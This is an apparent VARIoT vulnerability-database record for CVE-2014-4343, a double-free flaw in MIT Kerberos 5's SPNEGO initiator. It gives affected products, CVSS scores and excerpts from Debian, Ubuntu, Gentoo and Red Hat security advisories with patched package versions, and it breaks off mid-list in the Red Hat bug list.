Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0298", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.3" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.4" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.2" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.12" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.12.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.2" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.4" }, { "model": "kerberos", "scope": "eq", "trust": 0.8, "vendor": "mit kerberos", "version": "5 1.12.2" }, { "model": "kerberos", "scope": "lt", "trust": 0.8, "vendor": "mit kerberos", "version": "1.10.x from 1.12.x" }, { "model": "kerberos", "scope": "eq", "trust": 0.6, "vendor": "mit", "version": "5-1.11.4" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux 10.04.lts", "scope": null, "trust": 0.3, "vendor": "ubuntu", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.6" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.4" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.4" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.2" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.7" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.2" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "kerberos", "scope": "ne", "trust": 0.3, "vendor": "mit", "version": "51.12.2" } ], "sources": [ { "db": "BID", "id": "69159" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.12.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.10.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:1.11.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-4343" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The vendor reported this issue.", "sources": [ { "db": "BID", "id": "69159" } ], "trust": 0.3 }, "cve": "CVE-2014-4343", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.6, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 4.9, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 7.6, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "CVE-2014-4343", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-4343", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201408-251", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-4343", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Double free vulnerability in the init_ctx_reselect function in the SPNEGO initiator in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.10.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via network traffic that appears to come from an intended acceptor, but specifies a security mechanism different from the one proposed by the initiator. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. \nVersions prior to Kerberos 5 1.12.2 are vulnerable. \n\nCVE-2014-4343\n\n An unauthenticated remote attacker with the ability to spoof packets\n appearing to be from a GSSAPI acceptor can cause a double-free\n condition in GSSAPI initiators (clients) which are using the SPNEGO\n mechanism, by returning a different underlying mechanism than was\n proposed by the initiator. \n\nCVE-2014-4344\n\n An unauthenticated or partially authenticated remote attacker can\n cause a NULL dereference and application crash during a SPNEGO\n negotiation by sending an empty token as the second or later context\n token from initiator to acceptor. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.10.1+dfsg-5+deb7u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.12.1+dfsg-7. ==========================================================================\nUbuntu Security Notice USN-2310-1\nAugust 11, 2014\n\nkrb5 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Kerberos. This issue only affected Ubuntu\n12.04 LTS. This\nissue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected\nUbuntu 10.04 LTS and Ubuntu 12.04 LTS. \nThis issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. \n(CVE-2014-4344)\n\nTomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon\nincorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n krb5-admin-server 1.12+dfsg-2ubuntu4.2\n krb5-kdc 1.12+dfsg-2ubuntu4.2\n krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2\n krb5-otp 1.12+dfsg-2ubuntu4.2\n krb5-pkinit 1.12+dfsg-2ubuntu4.2\n krb5-user 1.12+dfsg-2ubuntu4.2\n libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2\n libgssrpc4 1.12+dfsg-2ubuntu4.2\n libk5crypto3 1.12+dfsg-2ubuntu4.2\n libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2\n libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2\n libkdb5-7 1.12+dfsg-2ubuntu4.2\n libkrad0 1.12+dfsg-2ubuntu4.2\n libkrb5-3 1.12+dfsg-2ubuntu4.2\n libkrb5support0 1.12+dfsg-2ubuntu4.2\n\nUbuntu 12.04 LTS:\n krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5\n krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5\n krb5-user 1.10+dfsg~beta1-2ubuntu0.5\n libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5\n libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5\n libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5\n\nUbuntu 10.04 LTS:\n krb5-admin-server 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13\n krb5-pkinit 1.8.1+dfsg-2ubuntu0.13\n krb5-user 1.8.1+dfsg-2ubuntu0.13\n libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13\n libgssrpc4 1.8.1+dfsg-2ubuntu0.13\n libk5crypto3 1.8.1+dfsg-2ubuntu0.13\n libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13\n libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13\n libkdb5-4 1.8.1+dfsg-2ubuntu0.13\n libkrb5-3 1.8.1+dfsg-2ubuntu0.13\n libkrb5support0 1.8.1+dfsg-2ubuntu0.13\n\nIn general, a standard system update will make all the necessary changes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-crypt/mit-krb5 \u003c 1.13 \u003e= 1.13 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in MIT Kerberos 5. Please\nreview the CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll MIT Kerberos 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-crypt/mit-krb5-1.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-4341\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341\n[ 2 ] CVE-2014-4343\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343\n[ 3 ] CVE-2014-4345\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345\n[ 4 ] CVE-2014-5351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-53.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: krb5 security, bug fix and enhancement update\nAdvisory ID: RHSA-2015:0439-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html\nIssue date: 2015-03-05\nCVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 \n CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 \n CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 \n CVE-2014-9423 \n=====================================================================\n\n1. Summary:\n\nUpdated krb5 packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\nKerberos is a networked authentication system which allows clients and\nservers to authenticate to each other with the help of a trusted third\nparty, the Kerberos KDC. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nA NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO\nacceptor for continuation tokens. A remote, unauthenticated attacker could\nuse this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)\n\nA buffer overflow was found in the KADM5 administration server (kadmind)\nwhen it was used with an LDAP back end for the KDC database. A remote,\nauthenticated attacker could potentially use this flaw to execute arbitrary\ncode on the system running kadmind. (CVE-2014-4345)\n\nA use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5\nlibrary processed valid context deletion tokens. An attacker able to make\nan application using the GSS-API library (libgssapi) call the\ngss_process_context_token() function could use this flaw to crash that\napplication. (CVE-2014-5352)\n\nIf kadmind were used with an LDAP back end for the KDC database, a remote,\nauthenticated attacker with the permissions to set the password policy\ncould crash kadmind by attempting to use a named ticket policy object as a\npassword policy for a principal. (CVE-2014-5353)\n\nA double-free flaw was found in the way MIT Kerberos handled invalid\nExternal Data Representation (XDR) data. An authenticated user could use\nthis flaw to crash the MIT Kerberos administration server (kadmind), or\nother applications using Kerberos libraries, using specially crafted XDR\npackets. (CVE-2014-9421)\n\nIt was found that the MIT Kerberos administration server (kadmind)\nincorrectly accepted certain authentication requests for two-component\nserver principal names. A remote attacker able to acquire a key with a\nparticularly named principal (such as \"kad/x\") could use this flaw to\nimpersonate any user to kadmind, and perform administrative actions as that\nuser. (CVE-2014-9422)\n\nAn information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS\nimplementation (libgssrpc) handled certain requests. An attacker could send\na specially crafted request to an application using libgssrpc to disclose a\nlimited portion of uninitialized memory used by that application. \n(CVE-2014-9423)\n\nTwo buffer over-read flaws were found in the way MIT Kerberos handled\ncertain requests. A remote, unauthenticated attacker able to inject packets\ninto a client or server application\u0027s GSSAPI session could use either of\nthese flaws to crash the application. An\nattacker able to spoof packets to appear as though they are from an GSSAPI\nacceptor could use this flaw to crash a client application that uses MIT\nKerberos. (CVE-2014-4343)\n\nRed Hat would like to thank the MIT Kerberos project for reporting the\nCVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT\nKerberos project acknowledges Nico Williams for helping with the analysis\nof CVE-2014-5352. \n\nThe krb5 packages have been upgraded to upstream version 1.12, which\nprovides a number of bug fixes and enhancements, including:\n\n* Added plug-in interfaces for principal-to-username mapping and verifying\nauthorization to user accounts. \n\n* When communicating with a KDC over a connected TCP or HTTPS socket, the\nclient gives the KDC more time to reply before it transmits the request to\nanother server. (BZ#1049709, BZ#1127995)\n\nThis update also fixes multiple bugs, for example:\n\n* The Kerberos client library did not recognize certain exit statuses that\nthe resolver libraries could return when looking up the addresses of\nservers configured in the /etc/krb5.conf file or locating Kerberos servers\nusing DNS service location. The library could treat non-fatal return codes\nas fatal errors. Now, the library interprets the specific return codes\ncorrectly. (BZ#1084068, BZ#1109102)\n\nIn addition, this update adds various enhancements. Among others:\n\n* Added support for contacting KDCs and kpasswd servers through HTTPS\nproxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)\n\n4. Solution:\n\nAll krb5 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. \n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1084068 - ipv6 address handling in krb5.conf\n1102837 - Please backport improved GSSAPI mech configuration\n1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly\n1109919 - Backport https support into libkrb5\n1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext\n1118347 - ksu non-functional, gets invalid argument copying cred cache\n1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens\n1121789 - CVE-2014-4343: use-after-free crash in SPNEGO\n1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators\n1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens\n1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure\n1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)\n1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update\n1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name\n1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)\n1179857 - 